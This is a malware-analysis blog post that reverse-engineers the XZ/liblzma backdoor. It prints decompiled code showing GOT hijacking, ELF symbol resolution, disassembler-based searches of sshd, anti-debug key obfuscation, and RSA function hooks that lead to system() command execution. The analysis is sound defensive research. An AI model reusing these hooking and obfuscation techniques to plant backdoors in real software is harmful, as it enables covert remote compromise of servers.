Reverse engineering the XZ backdoor

Overview

Over the past few weeks, I’ve been analyzing the xz backdoor. The modifications to the build process that inject the backdoor have already been analyzed very thoroughly (1, 2), so this writeup will be entirely focused on the binary blob that gets included into liblzma at the end. This writeup mainly focuses on the process by which the hook function is inserted into sshd, as opposed to the actual code execution capabilities of the hook. The hook function itself may be the subject of a future blog post.

Note: Any decompiler output that I show in this writeup is from my compiled version of liblzma.so.5.6.1, but the 5.6.0 version looks mostly identical. Since the 5.6.0 version has symbols, I’ll be using those symbol names to refer to the functions I discuss here.

Initial Steps

The entry point of the backdoor code is crc64_resolve, which calls _get_cpuid. get_cpuid is obfuscated to look like an ordinary functino to collect CPU information: it calls _cpuid, which is a legitimate function to execute the CPUID instruction.

However, _get_cpuid makes an obfuscated call to the entry point of the malicious code at .Llzma_delta_props_encoder. This is accomplished by finding the location where _cpuid is stored in the GOT, then overwriting the entry with the address of .Llzma_delta_props_encoder. It also appears that the GOT entry for _cpuid is restored after the backdoor code finishes executing in order to avoid raising suspicion.

00004d4d          int64_t real_cpuid = *cpuid_addr
00004d54          // overwrite _cpuid ptr in GOT with .Llzma_delta_props_encoder
00004d54          *cpuid_addr = got_baseaddr - 0x1a918
00004d57          int32_t* r8
00004d57          got_baseaddr = _cpuid(arg1, arg2, cpuid_addr, &data_2f200, r8)
00004d62          *cpuid_addr = real_cpuid

Setup and Symbol Parsing

ELF Loading

The backdoor uses many functions from shared libraries including libc and libcrypto, as well as functions from the sshd binary itself. In order to determine the locations of these functions, the backdoor must find the locations of each of the required ELF files in memory and parse certain segments. The entry point of this parsing is .Lget_literal_price.part.0, which takes a pointer to an ELF executable as its first argument and saves certain fields to a struct (struct elf_data) that gets passed in as the second argument.

The elf_data struct is defined in the following way:

struct elf_data __packed
{
    int64_t baseaddr; // pointer to the start of the ELF file in memory
    int64_t phdr_p_vaddr;
    struct Elf64_Phdr* phdr_table;
    int16_t hdr_count;
    __padding char _1a[6];
    struct Elf64_Phdr* phdr_dynamic_addr; // location of the first header with p_type PT_DYNAMIC
    uint32_t dyn_count; // total number of Elf64_Dyn structures in dynamic section
    __padding char _2c[4];
    char* strtab; // pointer to string table
    struct Elf64_Sym* symtab; // pointer to symbol table
    void* relocs_jmprel; // value read from Elf64_Dyn with tag DT_JMPREL
    uint32_t rel_count; // calculated from Elf64_Dyn with tag DT_PLTRELSZ
    int32_t gnu_relro_flag; // whether a segment of type PT_GNU_RELRO is present
    void* gnu_relro_vaddr; // address of PT_GNU_RELRO segment, if it exists
    int64_t gnu_relro_p_memsz; // size of PT_GNU_RELRO, if it exists
    int16_t* dt_verdef; // address of version definition table
    int64_t dt_verdefnum; // number of entries in version definition table
    Elf64_Versym* dt_versym; // address of .gnu.version (DT_VERSYM)
    void* dt_rela; // pointer to relocation table, read from Elf64_Dyn with DT_RELA tag
    uint32_t rela_count; // number of relocations
    __padding char _84[4];
    void* dt_tag_24; // location of Elf64_Dyn with d_tag = 24, couldnt find what that represents
    void* dt_tag_23; // Elf64_Dyn with d_tag = 23
    void* seg_x_start; // PT_LOAD segment with flags PF_X
    int64_t seg_x_size;
    void* seg_r_addr; // PT_LOAD segment with flags PF_R
    int64_t seg_r_size;
    uint64_t field_b8;
    int64_t field_c0;
    int64_t field_c8;
    char flags;
    __padding char _d1[7];
    int32_t gnu_hash_nbucket; // values from DT_GNU_HASH struct
    int32_t gnu_hash_bucket;
    uint32_t gnu_hash_bloom_shift;
    __padding char _e4[4];
    void* gnu_hash_bloom;
    int32_t* gnu_hash_buckets;
    int64_t* gnu_hash_chain;
};

String Table and Symbol Table

The function .Lcrc_init.0 looks up a symbol by name in a given ELF executable. As an added layer of obfuscation, the name of the string to look up is passed in as an index in a prefix trie, as described here.

The function enumerates symbols by iterating through the DT_GNU_HASH table:

0000765c              for (int32_t i = 0; i u< elf->gnu_hash_nbucket; i = i + 1)
00007670                  void* bucket = &elf->gnu_hash_buckets[zx.q(i)]
00007683                  // original name: .Lparse_bcj.0
00007683                  if (j_elf_lookup_addr(elf, addr: bucket, size: 4, flags: 4) == 0)
00007683                      break
00007698                  // get an individual hash from chain
00007698                  void* hash_ptr = elf->gnu_hash_chain + (zx.q(*bucket) << 2)

For each hash retrieved from the table, the corresponding entry in the symbol table is located. The st_name field is used to look up the offset of the symbol in the string table, at which point the name is looked up in the prefix trie to see if it matches the desired symbol. If a match is found, the function returns.

00007718                          int64_t sym_ptr = zx.q(sym->st_name) + elf->strtab
00007736                          if (j_elf_lookup_addr(elf, addr: sym_ptr, size: 1, flags: 4) == 0)
00007736                              break
0000774c                          // original name: .Lsimple_coder_update.0
0000774c                          if (lookup_trie(sym_ptr, nullptr) == sym_trie_idx)
00007753                              if (version_trie_idx == 0)
00007875                                  return sym

Optionally, .Lcrc_init.0 can also check whether the version information of the executable contains a given string. As far as I can tell, the only version entry that is ever searched for in this way is the string GLIBC_2.2.5.

0000775c                              Elf64_Versym* versym_ptr = &elf->dt_versym[sym_idx]
00007777                              if (j_elf_lookup_addr(elf, addr: versym_ptr, size: 2, flags: 4) == 0)
00007777                                  break
0000777d                              int32_t rax_14
0000777d                              rax_14.b = elf->flags
00007783                              Elf64_Versym versym = *versym_ptr
00007798                              if ((rax_14.b & 0x18) == 0x18 && (versym & 0x7ffe) != 0)
000077a5                                  Elf64_Verdef* dt_verdef = elf->dt_verdef
000077ae                                  int32_t j = 0
000077ba                                  while (zx.q(j) u< elf->dt_verdefnum)
000077d7                                      if (j_elf_lookup_addr(elf, addr: dt_verdef, size: 0x14, flags: 4) == 0)
000077d7                                          break
000077e3                                      if (dt_verdef->vd_version != 1)
000077e3                                          break
000077e9                                      int32_t rax_17
000077e9                                      rax_17.w = versym & 0x7fff
000077f3                                      if (rax_17.w == dt_verdef->vd_ndx)
0000781b                                          Elf64_Verdaux* aux = zx.q(dt_verdef->vd_aux) + dt_verdef
00007828                                          if (j_elf_lookup_addr(elf, addr: aux, size: 8, flags: 4) == 0)
00007828                                              break
00007831                                          int64_t vda_name = zx.q(aux->vda_name) + elf->strtab
0000784f                                          if (j_elf_lookup_addr(elf, addr: vda_name, size: 1, flags: 4) == 0)
0000784f                                              break
00007863                                          if (version_trie_idx == lookup_trie(vda_name, nullptr))
00007875                                              return sym

Relocations

In order to obtain the correct addresses for the symbols it looks up, the backdoor also parses the relocation table to calculate the address of the symbol after relocation. The relocation table is found during the initial parsing of the .dynamic section of the executable: the DT_JMPREL tag corresponds to the relocations associated with the PLT, and the DT_RELA tag corresponds to other relocations.

// .Llz_encode.1
0000afa0  int64_t do_reloc(struct elf_data* elf_data, Elf64_Rela* rela, int32_t count, int64_t idx, 
0000afa0      int32_t sym_name)

0000afb7      Elf64_Rela* rela_1 = rela
0000afd1      int32_t rax = check(code: nullptr, bit_idx: 0x67, num_bits: 5, flag_idx: 4)
0000afd6      int64_t i = 0
0000afda      if (rax != 0)
0000aff5          while (i u< zx.q(count))
0000afe0              uint64_t sym_idx = rela_1->r_info
0000afe9              if (zx.q(sym_idx.d) == idx)
0000b001                  struct Elf64_Sym* sym_addr = &elf_data->symtab[sym_idx u>> 0x20]
0000b00a                  if (sym_addr->st_shndx == 0 && lookup_trie(zx.q(sym_addr->st_name) + elf_data->strtab, nullptr) == sym_name)
0000b026                      break
0000afeb              i = i + 1
0000afee              rela_1 = &rela_1[1]
0000aff5      int64_t reloc_addr
0000aff5      if (rax == 0 || (rax != 0 && i u>= zx.q(count)))
0000afdc          reloc_addr = 0
0000aff5      if (rax != 0 && i u< zx.q(count))
0000b02c          reloc_addr = rela_1->r_offset + elf_data->baseaddr
0000b03c      return reloc_addr

The x86_64 Disassembler

As many people have already pointed out, the function .Lx86_code.part.0 is an x86_64 disassembler. The first argument is a struct (struct dasm) that gets filled in with different fields of the instruction. I haven’t determined what every field of it corresponds to, but here’s the struct definition with the fields that I do have:

struct dasm __packed
{
    void* addr;
    uint64_t size;
    __padding char _10[1];
    __padding char _11[3];
    char mandatory_prefix;
    char segment;
    char op_size_override;
    char addr_size_override;
    __padding char _18[1];
    __padding char _19[1];
    __padding char _1a[1];
    char rex_prefix;
    char modRM;
    char modRM_mod;
    char modRM_reg;
    char modRM_rm;
    __padding char _20[1];
    __padding char _21[1];
    __padding char _22[1];
    __padding char _23[1];
    __padding char _24[4];
    uint32_t opcode;
    __padding char _2c[4];
    int64_t mem_operand;
    int64_t imm_operand;
    __padding char _40[8];
    __padding char _48[8];
    __padding char _50[1];
};

The field that I’ve called opcode in this struct isn’t the actual opcode of the instruction, but it’s clearly related. In every example where I’ve seen it used, it’s actually equal to the opcode + 0x80, but I haven’t confirmed that that’s always what it is.

The disassembler is used to find locations of functions and structures in the sshd binary. Unlike the shared libraries, sshd doesn’t export any function names, and it’s usually not compiled with debug symbols. That means the backdoor needs a different way to determine where certain functions are. In addition, since sshd is compiled on many different version of many different Linux distributions, the backdoor can’t rely on specific functions being at specific offsets in the compiled binary. The disassembler allows the backdoor to search for patterns of instructions that it expects to appear in every version of sshd. There are too many of these searches for me to explain all of them here, but here’s one example to give you an idea of the level of complexity involved:

The function .Llzma_buf_cpy.0 is an example of one function that uses the disassembler to search for memory addresses. It first searches for a call instruction whose operand matches a given function. (The target function is passed as an argument to .Llzma_buf_cpy.0, but I only ever saw it called once to search for calls to xcalloc in the main function of usr/sbin/sshd.) Once it finds that call instruction, it checks for a mov immediately after.

0000e793              if (code u< end && dasm_find_call_insn(code, end, target: xcalloc_ptr, dasm: dasm_ptr) != 0) // dasm_find_call_insn = .Llzma_optimum_normal.0
0000e7cd                  code = dasm.size + dasm.addr
0000e7d9                  // dasm_find_opcode_arg = .Llzma_properties_size.0, opcode target is 0x109 - 0x80 = 0x89 (mov)
0000e7d9                  int32_t rax_3 = dasm_find_opcode_arg(code, end: &code[0x20], dasm: dasm_ptr, opcode: 0x109, target_operand: 0)

This particular mov instruction is opcode 0x89, which means the destination of the mov is a memory address. The ModR/M field of the instruction is checked to see if RIP-relative addressing is used, and if it is, the function takes that into account and adds the correct value to the memory address.

0000e856                              if ((modrm & 0xff00ff00) == 0x5000000)
0000e85d                                  mem_operand = mem_operand + dasm.addr + dasm.size

Looking at main, we can see that there are several calls to xcalloc that fit this pattern, all of which look something like this:

e822860400         call    xcalloc
4c89e7             mov     rdi, r12
be04000000         mov     esi, 0x4
4889c5             mov     rbp, rax
488905a8310d00     mov     qword [rel data_e3ba8], rax

These calls appear to be allocating memory for global data structures, with the mov instruction storing the pointer to the new structure at a known address. The structures that get allocated during these calls are sensitive_data, startup_pipes, startup_flags, and rexec_argv.

The function iterates through all of main looking for mov instructions that follow an xcmalloc call, saving each destination address of the mov to an array (operands in the code snippet below). It then appears to traverse the array looking for a set of three destination addresses that are adjacent to each other:

0000e8b3              op1 = (&operands)[i]
0000e8b7              int64_t j = 0
0000e8ec              int64_t k
0000e8ec              void* op2
0000e8ec              do
0000e8b9                  op2 = (&operands)[j]
0000e8bd                  k = 0
0000e8d3                  while (not(op1 == op2 - 8 && op2 == (&operands)[k] - 8))
0000e8e0                      k = k + 1
0000e8e5                      if (k.d u>= max)
0000e8e5                          break

The search for three adjacent addresses allows the function to determine which of the xcmalloc calls correspond to the sensitive_data struct. sensitive_data is defined in the following way:

struct {
	struct sshkey	**host_keys;		/* all private host keys */
	struct sshkey	**host_pubkeys;		/* all public host keys */
	struct sshkey	**host_certificates;	/* all public host certificates */
	int		have_ssh2_key;
} sensitive_data;

The host_keys, host_pubkeys, and host_certificates structures are allocated with three separate calls to xcmalloc, and pointers to the structures are stored in three adjacent fields of the sensitive_data struct.

To recap, it appears that the entire purpose of the function .Llzma_buf_cpy.0 is to find the sensitive_data struct, which it does by 1) disassembling until it finds a call to xzmalloc, 2) finding a mov instruction right after that call and storing the destination address, correctly accounting for relative addressing, and 3) determining which of those allocations correspond to contiguous fields of a struct.

Anti-Debug / Key Obfuscation

There are three different functions that seem to be used as anti-debug checks called at the start of a function: .Llzma2_decoder_end.1, .Llzma_index_iter_rewind.cold, and .Llzma_check_init.part.0. All of these are wrappers around .Lrc_read_init.part.0 (check_internal), which starts off the anti-debug checking process.

00025687      void* code_1 = nullptr
0002568c      struct global_ctx* global_ctx_1 = global_ctx
00025693      if (global_ctx_1 == 0)
00025693          goto done
00025695      uint64_t flag_idx_1 = zx.q(flag_idx)
000256a1      if (global_ctx_1->checked_before[flag_idx_1] != 0)
000256a1          goto done
000256a3      global_ctx_1->checked_before[flag_idx_1] = 1
000256d1      // do_tamper_checks: .Llzma2_encoder_init.1
000256d1      int32_t rax = do_tamper_checks(code, &code_1, nullptr, global_ctx_1->liblzma_start, global_ctx_1->liblzma_end, 1)
000256d8      int32_t rax_2
000256d8      int64_t rax_3
000256d8      if (rax != 0)
000256fd          // dasm_update_bit_arr: .Llzma_memlimit_get.1
000256fd          rax_2 = dasm_update_bit_arr(code: code_1, global_ctx->liblzma_end, bit_idx, num_bits, zx.d(option == 0))
00025704          if (rax_2 != 0)
00025706              struct global_ctx* global_ctx_2 = global_ctx
0002570a              global_ctx_2->bit_arr_count = global_ctx_2->bit_arr_count + num_bits
00025710              done:
00025710              rax_3 = 1
00025704      if (rax == 0 || (rax != 0 && rax_2 == 0))
000256da          rax_3 = 0
0002571f      return rax_3

The primary method of checking for a debugger is to iterate through a region of code and check for the presence of an endbr64 instruction. The function .Llzma_block_buffer_encode.0 (check_endbr64) performs this check. The third argument passed to this function is always 0xe230, so the condition that’s checked here holds if code == 0xfa1e0ff3, the opcode for endbr64.

0000d9f0  uint64_t check_endbr64(int64_t code, int64_t end, int32_t const_e230)

0000d9f7      int32_t var_8 = 0x5e2
0000da01      uint32_t rdx = 0
0000da03      int32_t var_4 = 0xf223
0000da0f      if (end - code s> 3)
0000da18          int32_t var_8_1 = 0x5e20000
0000da35          rdx = (0x5e20000 | const_e230) + *code == 0xf223 // (0xfa1e0ff3 + 0x5e2e230) & 0xffffffff = 0xf223
0000da3a      return zx.q(rdx)

Interestingly, the function that calls check_endbr64 also seems to have an option to perform a different check instead, but I never saw it used. Depending on a flag that’s passed as an argument, instead of calling check_endbr64, it uses the disassembler to search for an instruction where opcode == 0xf9f. I’m not sure when this would’ve been called, or even what opcode 0xf9f corresponds to, as the values that the disassembler uses to represent opcodes aren’t equal to the real opcode values.

0001f4be      if (option == 0)
0001f4de          int32_t option_1 = option
0001f4f2          struct dasm dasm
0001f4f2          int64_t rcx
0001f4f2          int64_t rdi
0001f4f2          rdi, rcx = __memfill_u32(&dasm, option_1, 0x58)
0001f50a          if (code_dasm(dasm: &dasm, code, end) != 0 && dasm.opcode == 0xf9f)
0001f511              char* next = dasm.size + dasm.addr
0001f518              if ((next.b & 0xf) == 0)
0001f51d                  if (insn_out != 0)
0001f526                      *insn_out = next
0001f51f                  option_1 = 1
0001f52c          option_2 = option_1
0001f4be      else
0001f4c5          option_2 = check_endbr64(code, end, offset: 0xe230)

If the endbr64 instruction is successfully located, the function .Llzma_lzma_encoder_init.0 (update_bit_arr) is called. This function makes some comparisons against the opcode produced in the disassembler output. If the opcode is not one of the opcodes in a given list, then a single 1 bit is stored to a specific offset in a bit array of size 0x1c8 bits (0x39 bytes).

00019e70  int64_t update_bit_arr(struct dasm* arg1, int32_t* bit_idx_ptr)

00019e74      int32_t bit_idx = *bit_idx_ptr
00019e7e      if (bit_idx u<= 0x1c7)
00019e80          uint32_t opcode = arg1->opcode
00019eb2          if (opcode != 0x109 && opcode != 0xbb && (opcode - 0x83 u> 0x2e || (opcode - 0x83 u<= 0x2e && ((0x410100000101 u>> (opcode - 0x83).b).b & 1) == 0)))
00019ec0              uint64_t byte_idx = zx.q(bit_idx u>> 3)
00019ec3              struct global_ctx* global_ctx_1 = global_ctx
00019ecf              global_ctx_1->bit_arr[byte_idx] = global_ctx_1->bit_arr[byte_idx] | (1 << (bit_idx.b & 7)).b
00019ed7          *bit_idx_ptr = bit_idx + 1
00019ede      return 1

By storing different bits to different offsets, the anti-debug checks gradually build up the value of a chacha20-encrypted ed448 key, which is used later on in the backdoor. Therefore, if you naively patch the check functions to always return success, the key value will still be wrong and the backdoor will not function.

Hooking

Setting Up The Hooks

The backdoor appears to set hooks for three functions: RSA_public_decrypt, RSA_get0_key, and EVP_PKEY_set1_RSA. However, all three hooks are wrappers around the function .Llzma_index_stream_size.1, which is responsible for the malicious behavior of the backdoor. After the malicious function has returned, the real function is called.

00016670  void RSA_get0_key_hook(RSA* r, struct BIGNUM** n, struct BIGNUM** e, struct BIGNUM** d)

00016680      struct global_ctx* global_ctx_1 = global_ctx
0001668a      if (global_ctx_1 != 0)
0001668c          struct crypto_table* crypto_table = global_ctx_1->crypto_table
00016693          if (crypto_table != 0)
00016695              void* real_RSA_get0_key = crypto_table->real_RSA_get0_key
0001669c              if (real_RSA_get0_key != 0)
000166a4                  if (r != 0)
000166b0                      RSA* r_1 = r
000166b4                      void done_before  // all_hooks: .Llzma_index_stream_size.1
000166b4                      all_hooks(rsa: r, global_ctx: global_ctx_1, done_before: &done_before)
000166d4                  jump(real_RSA_get0_key)

The mechanism by which the hooks are set is already explained in detail in this writeup by Kaspersky, so I’m not going to get too far into it. Essentially, there’s a callback function called symbind64 that gets called when a symbol is resolved. The backdoor overwrites this callback with a malicious version of symbind64 that replaces RSA_public_decrypt, RSA_get0_key, and EVP_PKEY_set1_RSA with its own hook functions. It also saves the real addresses of the three hooked symbols so that they can be called later.

0000b3b2          // //lookup_trie: .Lsimple_coder_update.0
0000b3b2          int32_t trie_val = lookup_trie(sym_name, nullptr)
0000b3b7          void* RSA_public_decrypt_got = crypto_syms->RSA_public_decrypt_got
0000b3c5          if (trie_val == 0x1d0 && RSA_public_decrypt_got != 0)
0000b3c7              int64_t real_RSA_public_decrypt = *RSA_public_decrypt_got
0000b3d0              if (real_RSA_public_decrypt u> 0xffffff)
0000b3d6                  crypto_syms->real_RSA_public_decrypt = real_RSA_public_decrypt
0000b3da                  uint64_t RSA_public_decrypt_hook = main_ctx->field_110
0000b3e2                  // RSA_public_decrypt overwrite
0000b3e2                  *RSA_public_decrypt_got = RSA_public_decrypt_hook

The Hook Function (`.Llzma_index_stream_size.1`)

The ed448 Key

Remember that array that all the anti-debug checks were storing bits to? If every check passes, the resulting bit array is the following:

0d bf cd 93 43 56 2e 97 a5 fa a4 18 27 2b f0 fa
ee 05 6f 55 8d 99 63 dc 71 2e 3d 8d fc 43 c0 ae 
fb fe 1a d1 f8 b8 d8 72 15 ce c6 be 1f da 8b d3 
c4 d8 5b 51 58 85 8d 66 da

The function .Lparse_lzma12.0 takes the bit array and decrypts it using ChaCha20. First, 48 null bytes are ChaCha20-encrypted using a key, nonce, and counter of all 0s. Then, the first 32 bytes of the result are used as a key, the next 4 bytes as a little-endian counter, and the remaining 12 bytes as a nonce to decrypt the bit array.

000249be              // use a key and IV of all 0s to encrypt 0x30 bytes,
000249be              // generating the next key and IV
000249be              void chacha_iv
000249be              rax_1 = chacha20(chacha_in: &var_b8, chacha_inl: 0x30, chacha_key: &var_b8, chacha_iv: &chacha_iv, chacha_out: &chacha_1_out, table: crypto_table)
000249c5              if (rax_1 != 0)
000249e9                  // use the generated key and IV to decrypt the array
000249e9                  // of bits
000249e9                  void chacha_iv_1
000249e9                  int32_t rax_2
000249e9                  rax_2.b = chacha20(chacha_in: &global_ctx->bit_arr, chacha_inl: 0x39, chacha_key: &chacha_1_out, chacha_iv: &chacha_iv_1, chacha_out: result, table: global_ctx->crypto_table) != 0

The end result of this decryption is the following key:

0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28 
34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48 
10 0c b0 6c 3a be 14 ee 09 28 a5 14 98 eb 16 89 
d5 fd 21 25 25 c8 43 36 00

Once the ed448 key is decrypted successfully, the first 32 bytes are used for decryption of the payload. The first 16 bytes of the modulus of the RSA key are used as the IV (consisting of a 4-byte counter followed by a 12-byte nonce), and the remaining bytes are the ciphertext.

00017562                      int128_t chacha_iv = rsa_bytes[0].o
00017571                      void ed448_key
00017571                      if (decrypt_ed448_key(result: &ed448_key, global_ctx) == 0) // decrypt_ed448_key: .Lparse_lzma12.0
00017571                          goto field_18_1
0001759b                      if (chacha20(chacha_in: &rsa_bytes[0x10], chacha_inl: rsa_key_size - 0x10, chacha_key: &ed448_key, chacha_iv: &chacha_iv, chacha_out: &rsa_bytes[0x10], table: global_ctx->crypto_table) == 0)
0001759b                          goto field_18_1

Code Execution

The methods used by the backdoor to perform code execution have already been pretty extensively documented. The writeup of this proof of concept explains the format of the payload in detail, and I highly recommend reading through it. Another proof of concept with additional functionality is available here.

The hook function unpacks three little-endian integers from the start of the RSA modulus and calculates the value rsa_key[0:4] * rsa_key[4:8] + rsa_key[8:16]. The resulting value is expected to be a value from 0 to 3, and it appears to specify a choice of multiple possible formats for the rest of the payload.

000174d9                      uint32_t rsa_field1 = rsa_bytes[0].d
000174e2                      if (rsa_field1 == 0)
000174e2                          goto done_hook
000174e8                      uint32_t rsa_field2 = rsa_bytes[4].d
000174f1                      if (rsa_field2 == 0)
000174f1                          goto done_hook
000174fb                      int64_t choice = rsa_field1 * rsa_field2 + rsa_bytes[8].q
00017507                      if (choice u> 3)
00017507                          goto done_hook

The now-decrypted ed448 public key is used to check whether the payload has a valid signature, ensuring that only the creator of the backdoor is able to use it. The PoCs that have been produced so far use a patched version of the binary where the public key is replaced with a key they control, allowing them to sign the payloads with their own key instead.

000150ed      EVP_PKEY* pkey = crypto_table->EVP_PKEY_new_raw_public_key(type: 0x440, e: nullptr, key: ecc_key, keylen: 0x39)
000150f6      if (pkey == 0)
000150f6          goto label_15163
000150f8      EVP_MD_CTX* ctx = crypto_table->EVP_MD_CTX_new()
00015101      if (ctx == 0)
00015101          goto label_1515d
00015117      uint64_t rax_8
00015117      if (crypto_table->EVP_DigestVerifyInit(ctx, pctx: nullptr, type: nullptr, e: nullptr, pkey) == 1)
0001512c          int32_t rax_7 = crypto_table->EVP_DigestVerify(ctx, sig: rsa_n, siglen: 0x72, tbs, tbslen: arg3 + 0x20)

The primary method of code execution looks to be the use of system() to execute a command that is included as another field of the RSA modulus payload. This occurs when the payload format is set to option 2, suggesting that options 0, 1, and 3 might be for something other than code execution through system().

00017ef4                                      void* command = payload_base + payload_offset
00017efb                                      if (*command == 0)
00017efb                                          goto exit
00017f01                                      global_ctx->syscalls->system(command)

Final Thoughts

Overall, this was one of the most interesting reversing projects I’ve done in a while: the use of a disassembler to find functions in a binary is a lot more sophisticated than the techniques you typically see, as was the obfuscation of the initial ChaCha20 key. Unfortunately, I wasn’t able to do much more than a very surface-level analysis of how the code execution works - someone with a little more knowledge of OpenSSH internals could find quite a bit more. I may come back to this at some point to see if I can find some of the things referenced in this thread.

References

https://www.openwall.com/lists/oss-security/2024/03/29/4
https://gynvael.coldwind.pl/?lang=en&id=782
https://research.swtch.com/xz-script
https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504
https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01
https://github.com/amlweems/xzbot
https://github.com/blasty/JiaTansSSHAgent
https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b
https://securelist.com/xz-backdoor-story-part-1/112354/
https://threadreaderapp.com/thread/1776691497506623562.html

Appendix: Function Tables

The backdoor stores the library functions that it uses at offsets to the global structure global_ctx (a pointer to this struct is saved at .Llzma12_coder.1). I kept track of which function were which by defining a struct for each function table with the names of the functions being used. I’ve included them here in case it’s useful for anyone else who’s been analyzing this:

struct crypto_table __packed // global_ctx+8
{
    void* real_RSA_public_decrypt;
    void* real_EVP_PKEY_set1_RSA;
    void* real_RSA_get0_key;
    void* RSA_public_decrypt_got;
    void* EVP_PKEY_set1_RSA_got;
    void* RSA_get0_key_got;
    void* DSA_get0_pqg;
    void* DSA_get0_pub_key;
    void* EC_POINT_point2oct;
    void* EC_KEY_get0_public_key;
    void* EC_KEY_get0_group;
    void* EVP_sha256;
    void* RSA_get0_key;
    void* BN_num_bits;
    void* EVP_PKEY_new_raw_public_key;
    void* EVP_MD_CTX_new;
    void* EVP_DigestVerifyInit;
    void* EVP_DigestVerify;
    void* EVP_MD_CTX_free;
    void* EVP_PKEY_free;
    void* EVP_CIPHER_CTX_new;
    void* EVP_DecryptInit_ex;
    void* EVP_DecryptUpdate;
    void* EVP_DecryptFinal_ex;
    void* EVP_CIPHER_CTX_free;
    void* EVP_chacha20;
    void* RSA_new;
    void* BN_dup;
    void* BN_bin2bn;
    void* RSA_set0_key;
    void* EVP_Digest;
    void* RSA_sign;
    void* BN_bn2bin;
    void* RSA_free;
    void* BN_free;
    struct syscalls_table* syscalls;
    int32_t count;
};

struct syscalls_table __packed // global_ctx+0x10
{
    int64_t count;
    void* malloc_usable_size;
    void* getuid;
    void* _exit;
    void* setresgid;
    void* setresuid;
    void* system;
    void* write;
    void* pselect;
    void* read;
    void* errno_location;
    void* setlogmask;
    void* shutdown;
};